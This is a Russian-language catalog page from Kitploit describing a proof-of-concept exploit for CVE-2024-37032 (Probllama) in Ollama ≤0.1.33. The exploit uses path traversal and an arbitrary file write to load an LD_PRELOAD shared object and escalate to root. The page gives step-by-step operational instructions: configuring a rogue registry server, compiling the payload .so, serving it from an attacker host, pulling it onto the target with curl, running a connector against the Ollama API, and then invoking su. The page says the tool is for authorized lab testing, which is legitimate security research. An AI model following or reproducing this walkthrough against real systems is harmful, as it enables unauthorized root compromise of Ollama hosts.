Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-37032-PoC — CVE-2024-37032 (Probllama) PoC для Ollama ≤0.1.33: обход пути и произвольная запись файла через обработку дайджеста модели, что приводит к автоматическому повышению привилегий. | Kitploit
Инструменты/GitHubGitHub/itzsh4dowxz/cve-2024-37032-poc
Повышение привилегийАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
itzsh4dowxz/cve-2024-37032-poc

CVE-2024-37032-PoC

CVE-2024-37032 (Probllama) PoC для Ollama ≤0.1.33: обход пути и произвольная запись файла через обработку дайджеста модели, что приводит к автоматическому повышению привилегий.

Репозиторий
832 месяцев назадЕщё не проверено

CVE-2024-37032 Probllama PoC — Обход пути и повышение привилегий Ollama

Этот репозиторий содержит сервер реестра FastAPI для доказательства концепции, скрипт коннектора и демо-библиотеку предзагрузки для авторизованного лабораторного тестирования.

Используйте это только на системах, которыми вы владеете или на которых вам явно разрешено тестирование.

Файлы

  • server.py: запускает сервер PoC FastAPI.
  • rogue_server/config.py: центральная конфигурация для сервера PoC.
  • connector.py: отправляет запросы pull/push к целевому API Ollama.
  • preload_privs_demo.c: исходный код C для полезной нагрузки в виде shared object.
  • requirements.txt: зависимости Python для сервера PoC.

1. Установка зависимостей сервера

На вашей хост-машине установите зависимости Python:

root@kitploit:~
python -m pip install -r requirements.txt

2. Настройка хоста и портов

Отредактируйте rogue_server/config.py на вашей хост-машине:

root@kitploit:~
HOST = "<your_host_ip_or_host_ip>"

Отредактируйте connector.py:

root@kitploit:~
SERVER_HOST = "<your_host_ip_or_host_ip:8000>"
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 11434

Примечания:

  • SERVER_HOST должен указывать на хост, на котором запущен server.py.
  • Если сервер PoC работает на порту 8000, укажите порт в обоих параметрах HOST и SERVER_HOST, например 10.10.16.160:8000.
  • TARGET_HOST и TARGET_PORT должны указывать на целевой API Ollama. Если connector.py запускается непосредственно на целевой машине, обычно верно 127.0.0.1:11434.
  • Если вы изменили rogue_server/config.py, перезапустите сервер PoC.

3. Сборка shared object

Скомпилируйте C-файл и назовите выходной файл libpreload_privs_demo.so:

root@kitploit:~
gcc -shared -fPIC -o libpreload_privs_demo.so preload_privs_demo.c

4. Передача файлов на целевую машину

Скопируйте эти файлы на авторизованную целевую машину:

  • libpreload_privs_demo.so
  • connector.py

Один из простых способов — раздать их с вашей хост-машины:

root@kitploit:~
python3 -m http.server 8081

Затем загрузите их с целевой машины:

root@kitploit:~
curl -O http://<your_host_ip>:8081/libpreload_privs_demo.so
curl -O http://<your_host_ip>:8081/connector.py

После загрузки shared object скопируйте его абсолютный путь на целевой машине и задайте этот же путь как exploit_path в rogue_server/config.py на хост-машине.

Пример:

root@kitploit:~
exploit_path = "/tmp/libpreload_privs_demo.so"

5. Запуск сервера PoC

Запустите сервер FastAPI на вашей хост-машине:

root@kitploit:~
python server.py

По умолчанию этот проект запускает Uvicorn на 0.0.0.0:8000.

6. Запуск коннектора

На авторизованной целевой машине выполните:

root@kitploit:~
python3 connector.py

Коннектор отправляет запросы pull и push к настроенному API Ollama.

7. Проверка результата

После завершения работы коннектора выполните:

root@kitploit:~
su

На уязвимой, правильно настроенной лабораторной цели должен использоваться путь предзагрузки, и можно будет наблюдать переход привилегий.

Устранение неполадок

  • Убедитесь, что брандмауэр хоста разрешает порт сервера PoC и временный порт файлового сервера.
  • Убедитесь, что SERVER_HOST в connector.py совпадает с HOST в rogue_server/config.py.
  • Убедитесь, что exploit_path — это точный абсолютный путь, где находится libpreload_privs_demo.so на целевой машине.
  • Убедитесь, что целевой API Ollama доступен по адресу TARGET_HOST:TARGET_PORT.
  • Перезапустите server.py после изменения rogue_server/config.py.
Скачать инструмент